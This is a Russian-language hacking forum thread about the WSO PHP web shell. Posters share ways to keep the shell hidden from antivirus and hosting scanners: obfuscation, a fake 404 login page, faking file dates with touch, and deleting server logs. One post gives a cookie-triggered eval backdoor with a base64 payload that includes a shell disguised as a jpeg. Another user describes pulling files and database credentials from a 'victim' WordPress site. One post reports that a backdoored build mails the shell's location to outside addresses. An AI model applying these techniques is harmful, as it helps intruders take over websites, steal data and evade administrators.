Стоит изменить сообщение, вылазит либо ошибка синтаксиса и т.п. - все как должно быть.
Через adminer все правиться, но макросы вылазят. Так что думаю что лучше поправить через Wso... Но не получается.
winstrool
19.02.2014, 23:12
Да полные права.
Когда этот запрос делаю, сообщений никаких не выходит.
Стоит изменить сообщение, вылазит либо ошибка синтаксиса и т.п. - все как должно быть.
Через adminer все правиться, но макросы вылазят. Так что думаю что лучше поправить через Wso... Но не получается.
Пользуйтесь обычными кавычками а не задними пример:
UPDATE table_name set column='блф-бла' where id=1
Перезалейте, ссылки умерли
Strilo4ka
11.06.2014, 21:07
Перезалейте, ссылки умерли
на рдот зайдите, там есть.
billybonse
10.07.2014, 01:12
https://rdot.org/forum/showthread.php?t=1085
Почему не выводится переменная $a в wso "Execution PHP-code"?
$a = 1;
function test() {
global $a;
echo 'out: ' . $a;
}
test();
Вывод:
out:
// Решение
PHP code execution выполняется не в глобальном пространстве имен, а в функции и по этому применение global не допустимо.
защитить web php shell
как можно сделать что бы на шелл не реагировали антивирусы и при этом он ещё функционировал на хостинге?
например касперский на WSO шелл реагирует как на вирус backdoor
https://pp.vk.me/c625621/v625621076/1d9b6/BIufdcl0_kU.jpg
а ведь на хостингах могут провести сканирование, и найти файлик можно же.
как защитить файл шела от нахождения? а в часности антивирусом?
ещё один вопрос - а можно ли изменить дату заливки файлов ? как например через total commander делаеся
а то по дате загрузки видно что недавно загружалось.
ещё почемуто wso не архивирует файлы с папками, хотя версия 2.5, нужно слить самописный скрипт
как можно сделать что бы на шелл не реагировали антивирусы и при этом он ещё функционировал на хостинге?
например касперский на WSO шелл реагирует как на вирус backdoor
https://pp.vk.me/c625621/v625621076/1d9b6/BIufdcl0_kU.jpg
а ведь на хостингах могут провести сканирование, и найти файлик можно же.
как защитить файл шела от нахождения? а в часности антивирусом?
ещё один вопрос - а можно ли изменить дату заливки файлов ? как например через total commander делаеся
а то по дате загрузки видно что недавно загружалось.
ещё почемуто wso не архивирует файлы с папками, хотя версия 2.5, нужно слить самописный скрипт
Используй pas.
для изменения даты используйте touch
Используй pas.
Спасибо!
а в нём пароль в дальнейшем нельзя сменить ?
Спасибо!
Можно, если деобфусцировать.
Спасибо!
можно на официально странице создания шелла установить свой пароль
http://profexer.name/pas/download.php
Как узать, в какую папку на сервере, заливаеться WSO?
Как узать, в какую папку на сервере, заливаеться WSO?
для этого нужно запустить wso
для этого нужно запустить wso
Помогите разобраться, как его запустить? Тоесть, закинуть php файл на сервер и все?
Может есть какие то сылки на видео или статью. Потому что я ищу, но толком как с ним работать не нашел
Помогите разобраться, как его запустить? Тоесть, закинуть php файл на сервер и все?
Может есть какие то сылки на видео или статью. Потому что я ищу, но толком как с ним работать не нашел
да, закинуть и открыть
да, закинуть и открыть
А как узнать, в какую папку он попал?я незнаю куда он заливаеться?просто, когда хочу открить, то начинаеться его скачиванье, но как открить, что б он обработался и заработал?в базе, нет ничего, о пути к файлу. Можно, узнать, как то, без брут форсу?
А как узнать, в какую папку он попал?я незнаю куда он заливаеться?в базе, нет ничего, о пути к файлу. Можно, узнать, как то, без брут форсу?
поэтому хэккеров сейчас не так много. папки надо искать, языки какие-то учить..
попробуйте другими способами, либо брутфорс. может найдете читалку файлов на сервере и посмотрите, куда все загружается
поэтому хэккеров сейчас не так много. папки надо искать, языки какие-то учить..
попробуйте другими способами, либо брутфорс. может найдете читалку файлов на сервере и посмотрите, куда все загружается
Понял, спасибо
Мне нужно через WSO2 скачать папку с сервера.
Я пробовал выделять папку и нажимать compress, чтобы заархивировать папку - но никакого архива рядом с папкой не появляется. Как можно скачать всю папку?
winstrool
21.03.2015, 20:44
Мне нужно через WSO2 скачать папку с сервера.
Я пробовал выделять папку и нажимать compress, чтобы заархивировать папку - но никакого архива рядом с папкой не появляется. Как можно скачать всю папку?
а после, в выпадающем меню, где выбирали за архивировать, появляется строчка Paste, ее нужно клацнуть!
Выбираю compress (пробовал и zip и tar.gz)
Появляется строка с именем файла:
wso_20150321_184812.zip
Жму на кнопку >>
Потом в выпадающем меню появляется Paste - выбираю, жму на кнопку >>.
Ничего не происходит, архив не появляется.
winstrool
21.03.2015, 21:05
Выбираю compress (пробовал и zip и tar.gz)
Появляется строка с именем файла:
wso_20150321_184812.zip
Жму на кнопку >>
Потом в выпадающем меню появляется Paste - выбираю, жму на кнопку >>.
Ничего не происходит, архив не появляется.
при этой строке, там же где была кнопка compress в выпадающем меню, появляется новая строчка Paste, ее обязательно надо указать, а потом щелкайте по кнопе>>
http://s15.postimg.org/tgk9xqc4b/image.png
при этой строке, там же где была кнопка compress в выпадающем меню, появляется новая строчка
Paste
, ее обязательно надо указать, а потом щелкайте по кнопе
>>
http://s15.postimg.org/tgk9xqc4b/image.png
Премного благодарен.
Делаем мультиаплоад в шелле. Выложил на Rdot, дублирую также сюда:
http://picabox.net/uploads/2014/534.png
http://picabox.net/uploads/2014/535.png
Правим input аплоада
Upload file:$is_writable
>'>
Далее строка примерно 522
case'uploadFile':
...
.....
break;
Заменяем там блок на
case'uploadFile':
if (is_array($_FILES['f']['tmp_name']) ) {
foreach ($_FILES['f']['tmp_name'] as$i=>$tmpName) {
if (!@move_uploaded_file($tmpName,$_FILES['f']['name'][$i])) {
echo"Can't upload file!";
}
}
}
break;
Maser_Montan
10.05.2015, 23:47
↑ (https://antichat.live/posts/3845402/)
написали бы в чем отличия
.:[melkiy]:.
21.05.2015, 21:38
в присутствии бэкдора, пологаю
https://code.google.com/p/wso-web-shell-2-8/
Уже на Google Code есть. Версия 2.8. Странно, что он ещё в Metasploit не включён.
А на счёт выкладывания его на GitHub или Google Code, мне кажется, идея здравая. Всё-равно это сто лет как паблик. А пилить вместе всегда веселее.
Или это противоречит политике GitHub?
↑ (https://antichat.live/posts/3866672/)
https://code.google.com/p/wso-web-shell-2-8/
Уже на Google Code есть. Версия 2.8. Странно, что он ещё в Metasploit не включён.
А на счёт выкладывания его на GitHub или Google Code, мне кажется, идея здравая. Всё-равно это сто лет как паблик. А пилить вместе всегда веселее.
Или это противоречит политике GitHub?
Запустил WSO2.8_undetectable.php на локалхосте с SMTP-заглушкой.
Скриптом отправляется 2 письма на следующие адреса:
fwrite@live.ca (mailto:fwrite@live.ca), f3d0s3rv3r@hotmail.com (mailto:f3d0s3rv3r@hotmail.com)
.SpoilerTarget" type="button">Spoiler: Письмо 1
X-Sendmail-Cmdline: sendmail.pl -t -i
To: fwrite@live.ca (mailto:fwrite@live.ca)
Subject: array localhost/WSO2.8_undetectable.php
X-PHP-Originating-Script: 0:WSO2.8_undetectable.php(2) : regexp code(1) : eval()'d code(4) : eval()'d code(1) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code(2) : eval()'d code
localhost/WSO2.8_undetectable.php
.SpoilerTarget" type="button">Spoiler: Письмо 2
X-Sendmail-Cmdline: sendmail.pl -t -i
To: f3d0s3rv3r@hotmail.com (mailto:f3d0s3rv3r@hotmail.com)
Subject: WebShell http://localhost/WSO2.8_undetectable.php by 127.0.0.1
X-PHP-Originating-Script: 0:WSO2.8_undetectable.php(2) : regexp code(1) : eval()'d code(4) : eval()'d code(1) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code(2) : eval()'d code(276) : eval()'d code(1) : eval()'d code
Bug: localhost/WSO2.8_undetectable.php by 127.0.0.1
Кто-нибудь вообще криптует/минифицирует/обфусцирует WSO2?
Есть в этом смысл вообще? Или современные антивирусы имеют интерпретатор PHP?
winstrool
13.07.2015, 14:42
Смысл имеет! У меня к примеру сейчас, есть вариант который не один ав не палит, что позволяет дольше быть незамеченным на хостинге. ручками все делал, хочу свой оббусификатор написать но ручки пока не доходят, вариант на 50% сырой еще.
Expl0ited
19.07.2015, 20:18
↑ (https://antichat.live/posts/3870172/)
https://github.com/HARDLINUX/webshell
Новый WebShell 2015 года, если кто шарит помогайте улучшать
https://camo.githubusercontent.com/c0f20439c2c91ae4af524e5d9fc8987d20aec720/68747470733a2f2f70702e766b2e6d652f633632353633312f 763632353633313430302f34323263622f537844426f48334b 6a36732e6a7067
И что же ты изменил? Испортил дизайн и добавил бесполезную ***ню?
↑ (https://antichat.live/posts/3870172/)
Новый WebShell 2015 года, если кто шарит помогайте улучшать
https://camo.githubusercontent.com/c0f20439c2c91ae4af524e5d9fc8987d20aec720/68747470733a2f2f70702e766b2e6d652f633632353633312f 763632353633313430302f34323263622f537844426f48334b 6a36732e6a7067
Сделай описание что нового ты добавил в эту версию.
↑ (https://antichat.live/posts/3870234/)
И что же ты изменил? Испортил дизайн и добавил бесполезную ***ню?
Он ничего не добавил, самое смешное смотреть за историей правок файла. Кстати за основу был взят wso 2.1 этот хакир видимо не знает даже происхождение шелла и что есть 2.5 версия. Во всем виноваты каникулы.
1)
-/* WSO 2.1 (Web Shell by oRb) */
+/* WSO 2.2.0 (Web Shell by oRb) */
2)
-/* WSO 2.2.0 (Web Shell by oRb) */
+/* WSO 2.2.0 (Web Shell by Pirat) */
3)
-/* WSO 2.2.0 (Web Shell by Pirat) */
+/* WSO 2.2.0 (Web Shell by HARD _LINUX) */
4)
-$auth_pass = "21232f297a57a5a743894a0e4a801fc3";
+$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
5)
-$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
+$auth_pass = "21232f297a57a5a743894a0e4a801fc3";
PS Для чего была вставлена строка?
$millink='
https://github.com/HARDLINUX/webshell/search?utf8=✓&q=';
↑ (https://antichat.live/posts/3870481/)
усвершенствованая функция скрытия
Жмем на 80 ,появляется окно ввода пароля
http://snag.gy/wLCnQ.jpg
код
function wsoLogin() {
die("
404 Not Found
Not Found
The requested URL index.php was not found on this server.
Apache/2.2.22 (Linux) Server at Port 80
Password: >'>");
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if (!empty($auth_pass)) {
if (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || ($_COOKIE[md5($_SERVER['HTTP_HOST']) ] != $auth_pass)) wsoLogin();
}
как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл
↑ (https://antichat.live/posts/3870485/)
как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл
Отличая идея,что-то не подумал сразу.
↑ (https://antichat.live/posts/3870491/)
Отличая идея,что-то не подумал сразу.
И палить шелл GET-ом, а про cookie, user-agent, accept-language и т.п. уже забыли.
понравилась онлайн версия билдера wso
возник вопрос, чем шифруется wso ?(пункт Запаковать как в 2.5)
и ещё вопрос, можно ли такой билдер найти? что бы себе на локалхосте делать сборки wso!
можно браузер чекать по useragent - а его рандомно сделать и грузить через useragent switcher + проверка по Ip если потребуется - мне эти способы нравятся, самое хреновое если админ видет что туда обращение идёт через логи
в логах видно что идут запросы, но если сайт крупный и ещё понасрать в логи разными запросами к стандартным страницам то можно и затеряться, но я удаляю файлы логов
на крупных ресурсах как раз мониторят на фронтах еррор логи от бек эндов, и когда отдается тот же 404 больше шансов что заметят, чем 200 ок
↑ (https://antichat.live/posts/3870569/)
самое хреновое если админ видет что туда обращение идёт через логи
и ещё понасрать в логи разными запросами к стандартным страницам то можно и затеряться
Зачем столько гемора? Если есть возможность правки, то запрятать в строках примитивный код типа
$logout=base64_decode($_COOKIE['logout']);
if (isset($_COOKIE['logout']))
{@die(eval($logout));}
поправить время через touch (https://ru.wikipedia.org/wiki/Touch), залить jpeg-шелл в аватарки/etc и печеньку подсунуть
logout=aW5jbHVkZSgiL2hvbWUvdXNlci93d3cvYXZhdGFycy9 1c2VyLmpwZyIpOw==
Вариантов много, лиж бы фантазии хватило.
winstrool
21.07.2015, 07:36
↑ (https://antichat.live/posts/3870567/)
понравилась онлайн версия билдера wso
возник вопрос, чем шифруется wso ?(пункт Запаковать как в 2.5)
и ещё вопрос, можно ли такой билдер найти? что бы себе на локалхосте делать сборки wso!
Там же есть описание http://kronus.me/2012/07/wso-builder-v1-04/ и ссылка для скачивания http://kronus.me/wp-content/uploads/2012/07/builder_v1.042.zip так то любопытный конструктор
а что за файлы в билдере такие с расширением .inc?
↑ (https://antichat.live/posts/3871130/)
А догадайся с трёх раз
.inc include библиотеки с функциями или любые другие подключаемые файлы.
могли бы помочь в разработке, а не критиковать.
Смысл? Я им не пользуюсь. В свое время я помогал автору шела. Сейчас я помогаю по возможности другому автору другого шела.
Какие есть предложения? Что именно ты хочешь сделать, какие есть замечания и самый главный вопрос чем эта версия лучше последней?
ссылку на git надо заменить, пока не нашел нормальной базы эксплойтов.
А может её вообще убрать лучше? По мне так только идиот с шела будет переходить по внешним ссылкам оставляя реферер да вообще данного рода поиск не точный потому как берется полная фраза для поиска а по сути важен только год а не версия ядра с включенным именем хоста.
Сокращение от include, так обычно обзывают библиотеки с функциями или любые другие подключаемые файлы.
так обычно обзывают библиотеки
А еще так обычно находят исходники на сайте, изучают и хекают потом )
заметил что шеллы переодически удаляются, возможно где то спрятан скрипт который отслеживает появление новых файлов на хостинге
прячу и в картинку и в txt но всё равно шелы исчезают
как можно ещё спрятать ? скрипт палящий не нашёл, файлов много, сайт на битриксе
wso зашифрованный, логи я удаляю после завершения входа
добавил вывод ошибок.
всмысле? error_reporting включил?
Я ничего не понял ты можешь выражаться ясно? ты добавил перенаправление 2>&1 для консоли или просто включил error_reporting если второе ты ты дибил однозначно
исправил некоторые баги
Перечень багов пожалуйста сюда списком.
Преимущества этого webshell в том что он не палица
Не палится чем именно, список.
и находит уязвимость в некоторых хостингах
Смысл? Я считаю это уже нужно самому проверять а не увеличивать размер шела таким бесполезным функционалом который не каждый использует. Как по мне я бы даже вырезал несколько моментов из шела за ненадобностью тем самым сократив код.
↑ (https://antichat.live/posts/3871312/)
это ты больной на голову, скачай посмотри, хули как телка ломаешься
Вангую что ты сегодня последний день на форуме)))
Ты внатуре даун что ли, я ему пишу выложи дифф правок или хотя бы опиши что ты сделал а он мне "скачай посмотри" что посмотреть? Ты думаешь мне интересно делать дифф старой версии шела с твоей версией чтоб посмотреть что ты там натворил? Судя по тому что ты включил вывод ошибок error_reporting ты уже показал что ты идиот который не знает что делает и зачем. По поводу перенаправления 2>&1 ясен хрен не нужно его делать, ну разве что ты хочешь упороть шелл окончательно то делай. Чтоб ты дурачек знал многие люди специально делают перенаправление буфера ошибок в /dev/null чтоб не видеть лишней инфы, а ты сейчас предлагаешь её обьеденить с буфером вывода.
В общем я не буду больше ничего писать потому как с каждым твоим ответом я все больше убеждаюсь что ты очередной нарисовавшийся вася на время каникул решил тут херни натворить. И все таки не понимаю как это палился и теперь не палиться, чем ты это можешь подтвердить и как я могу это перепроверить? Не палиться что ли антивирусом clamav? Так напиши по русски или чем не палиться я понять не могу. Качать это УГ есесно не буду. В общем удачи, я смотрю критику ты не воспринимаешь и явных овтетов не даешь, все упирается в "скачай посмотри"
админ хитрый, мониторит файлы на наличие новых файлов на сервере + предыдущий файл снёс и запретил входить в админку всем подрят
но есть доступ к базе через phpmyadmin
войти в админку сайта не получается - стоит блок - разрешает определённым ip или юзерагентам (bitrix)
можно ли через phpmyadmin залить шелл ? что то пробовал как по этому видео
но мини шелл не работает - не выводит phpinfo
скину в лс логин/pass от sql, помогите пожалуйста
↑ (https://antichat.live/posts/3872008/)
скину в лс логин/pass от sql, помогите пожалуйста
Ты темой ошибся и скинь в лс.
CodeHunter
24.07.2015, 15:33
на хостинге не пошло
Forbidden: a malicious file has been detected.
Detected as: PHP.Shell-38
печалька
а не подскажете как базу ломануть сим превосходным инструментом?
winstrool
28.07.2015, 01:12
↑ (https://antichat.live/posts/3873473/)
Базу вы "сим превосходным инструментом" ни как не взломаете, если только имеете логин, пароль, удаленый хост и название БД!
при условии что шел ужу лежит на хосте жертвы.
CodeHunter
28.07.2015, 10:50
↑ (https://antichat.live/posts/3873473/)
сим превосходным инструментом вы можете слить файл конфиги с паролем, логином и хостом базы (например от вордпресса или джумалы) при условии что вы сможете залить этот шелл на сервер
так вот в том то и фошка что шел у жертвы а жертва умная попалась конфиги WP позапрятал так что я не могу пути отследить. а у него там сайтик как раз как мне нужно лежит хотел его весь стянуть файлы выгрузил а к бызе подобратся на получается. Оно конечно можно заморочится и найти эти конфигиЮ но просто интересно было может шел может както подобратся к базе быстрее меня. Пробовал вывести на страницу все содержимое $wpdb но по тем логин паролю что получил почему то шел в базу не пускает. Может подскажет кто, навенрняка есть какойнибудь готовый скриптик чтоб его в код внедрить и сделать дамп БД
CodeHunter
28.07.2015, 12:40
↑ (https://antichat.live/posts/3873576/)
так вот в том то и фошка что шел у жертвы а жертва умная попалась конфиги WP позапрятал так что я не могу пути отследить. а у него там сайтик как раз как мне нужно лежит хотел его весь стянуть файлы выгрузил а к бызе подобратся на получается. Оно конечно можно заморочится и найти эти конфигиЮ но просто интересно было может шел может както подобратся к базе быстрее меня. Пробовал вывести на страницу все содержимое $wpdb но по тем логин паролю что получил почему то шел в базу не пускает. Может подскажет кто, навенрняка есть какойнибудь готовый скриптик чтоб его в код внедрить и сделать дамп БД
таких скриптов не знаю, ищи wp-config.php в корне сайта или скачай все файлы и тотал командером сделай поиск файлов в которых содержится текст: DB_PASSWORD
не могу понять как ты смог залить шелл на хост и не можешь найти конфиг файл
да в том то и дело что в конфиче нет пароля к бд либо он зашифрован вот содержимое конфига
[PHP]
[COLOR="#0000BB"]uY+vh|~P93-nfaS,RrC7G2%C^x4?');
define('NONCE_SALT', '}Avp[COLOR="#007700"]
я не силен во всякого рода шифровании но я так понимаю что тут
[PHP]
[COLOR="#0000BB"]uY+vh|~P93-nfaS,RrC7G2%C^x4?');
define('NONCE_SALT', '}Avp[COLOR="#007700"]
может он и был в файле wp-config.php , но бывают случаи когда файл отображается не полностью,то в в шелле нажми на Highlight и отобразится пасс
У меня вчера на 3 сервантах такое было
↑ (https://antichat.live/posts/3873715/)
может он и был в файле wp-config.php , но бывают случаи когда файл отображается не полностью,то в в шелле нажми на Highlight и отобразится пасс
внатуре сработало. чувак где ты раньше был я уже два дня этот сайт штурмом взять пытаюс. спасибо
только вот Access denied for user '*****'@'localhost' (using password: YES) такая беда
а не все в порядке просто что то заглючило залогинился в шеле заново и пустило
↑ (https://antichat.live/posts/3873715/)
Это в оригинальном шеле такой бок или в кривых форках?
В оригинальном,качал с рдота
↑ (https://antichat.live/posts/3875169/)
Это в оригинальном шеле такой бок или в кривых форках?
пробовал два варика оригинал и какойто форк в обоих случаях такая хрень была
Кто знает какие есть веб шеллы написанные на Python?
↑ (https://antichat.live/posts/3875266/)
Кто знает какие есть веб шеллы написанные на Python?
wso2. https://rdot.org/forum/showthread.php?t=147
↑ (https://antichat.live/posts/3875262/)
пробовал два варика оригинал и какойто форк в обоих случаях такая хрень была
https://rdot.org/forum/showthread.php?t=1567 попробуй этим открыть, просто ради интереса будет такой баг или нет. Если будет я исправлю в обеих шелах
↑ (https://antichat.live/posts/3875382/)
https://rdot.org/forum/showthread.php?t=1567
попробуй этим открыть, просто ради интереса будет такой баг или нет. Если будет я исправлю в обеих шелах
Нет,баг только в wso
↑ (https://antichat.live/posts/3875437/)
Нет,баг только в wso
Значит подозреваю что аналогичный этому багу баг https://rdot.org/forum/showpost.php?p=38748&postcount=120
а можно ли шеллы запускать из архива с паролем ? шелл как бы в контейнере с паролем но работает при правильном пароле ?
ps стандарнтые способы как то обнаруживают - хоть и зашифрован, но чем обнаруживают ? может ли это быть скрипт который смотрит появление новых файлов на хосте ? а как этот скрипт способы есть найти и удалить, а потом шелл ставить ?
hardclubber
07.08.2015, 15:54
Спасибо
↑ (https://antichat.live/posts/3875638/)
а можно ли шеллы запускать из архива с паролем ? шелл как бы в контейнере с паролем но работает при правильном пароле ?
ps стандарнтые способы как то обнаруживают - хоть и зашифрован, но чем обнаруживают ? может ли это быть скрипт который смотрит появление новых файлов на хосте ? а как этот скрипт способы есть найти и удалить, а потом шелл ставить ?
чувак ты вообще понимаешь как работает php и тот же бекэнд? если есть рут доступ, можно написать такой мега изврат, но это тупо
по твоему вопросу, попробуй залить обычный файл, не шелл, а тот же пхпинфо или ещё какую-то беспаливную хрень, если запалят/удалят, значит действительно чекаеют диры и сравнивают хеш суммы
P.s. ну и посты тут встречаются, школота добралась до хака эх, хорошо хоть каникулы у них скоро закончатся
[QUOTE = "CodeHunter, должность: 3872225, член: 268122"] на хостинге не пошло
Запрещено: вредоносный файл был обнаружен.
Определен как: PHP.Shell-38
печалька [/ QUOTE]
Этот попробуй
Или воспользуйся еще этим http://fopo.com.ar/
↑ (https://antichat.live/posts/3880405/)
можно написать такой мега изврат, но это тупо
Это не тупо, изврат полезен, взять ту же обфускацию? Шелл в том же zend не пробовал?
а что за шифрование используется в wso билдере ?
на хостинге отключили ftp, хотел wso поставить сделал в билдере только файловый менеджер - хоть он и зашифрован, но его палит хостинг
как сделать что бы обходил палево ?
шел то с паролем, + проверяет доступ к нему по кукам, ip и юзерагенту вместе
winstrool
27.08.2015, 20:21
↑ (https://antichat.live/posts/3884584/)
на хостинге отключили ftp, хотел wso поставить сделал в билдере только файловый менеджер - хоть он и зашифрован, но его палит хостинг
Сменить сигнатуру шифрования/оббуссифекации, или попросить тех кто умеет это если не можете сами...
↑ (https://antichat.live/posts/3880777/)
Это не тупо, изврат полезен, взять ту же обфускацию? Шелл в том же zend не пробовал?
zend сильно в глаза бросается при выявлении шелла на площадке
Можно использовать свою функцию, которая будет декриптовать шелл, скажем по ключу из сессии, естественно и упаковщик под него надо писать, где и будет задаваться ключ для декриптора, также можно сделать так чтоб распаковывался и сам архив с заданным паролем, но тут нужно выполнение системных команд, которые включены не везде...
↑ (https://antichat.live/posts/3881050/)
а что за шифрование используется в wso билдере ?
Стандартные упаковщики, которые палится всем чем можно!
Заархивировать в PHP нельзя. Ну по крайней мере до 5,5 включительно. Про PHP 7 не знаю, но скорее всего и там нельзя. То есть функции архивации там есть, но работают они только с данными. То что разорхивировано запустить в памяти нельзя, только создавать новый хайл и его запускать. По поводу детекта ниже.
Для детекта на хостингах обычно используются два основных метода.
1. Мод секюрити с обвесом, его можно обходить без особого труда, т.к. там обычный сигнатурный анализ
2. DrWeb, его увы не обойдешь никак. Он использует для анализа песочницу, где запускает файл и после его декрипта анализирует. Ловит по наличию опасных функций и кусков кода, обойти его нельзя.
Попробуй https://github.com/epinna/weevely3
↑ (https://antichat.live/posts/3887130/)
Заархивировать в PHP нельзя. Ну по крайней мере до 5,5 включительно.
Архивы поддерживаются давно, но через врапперы, а начиная с версии 5.3 архив phar можно поместить непосредственно в файл php.
Wso без проблем работает в таком архиве.
появилась возможность разместиь шелл с сайтом на wordpress, но хостинг http://www.hostinger.ru (http://www.hostinger.ru/) блокирует wso шелл, даже зашифрованый + запароленый, после ввода пароля пишет Forbidden: a malicious file has been detected. Detected as: PHP.Shell-38
есть ли билдеры - которые нормально шифруют шелл, что бы тот не обнаруживался хостингом ?
winstrool
16.09.2015, 19:34
↑ (https://antichat.live/posts/3891736/)
появилась возможность разместиь шелл с сайтом на wordpress, но хостинг
http://www.hostinger.ru (http://www.hostinger.ru/)
блокирует wso шелл, даже зашифрованый + запароленый, после ввода пароля пишет Forbidden: a malicious file has been detected. Detected as: PHP.Shell-38
есть ли билдеры - которые нормально шифруют шелл, что бы тот не обнаруживался хостингом ?
Могу попробовать своим криптором пройтись в рамках интереса, пиши в аську
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot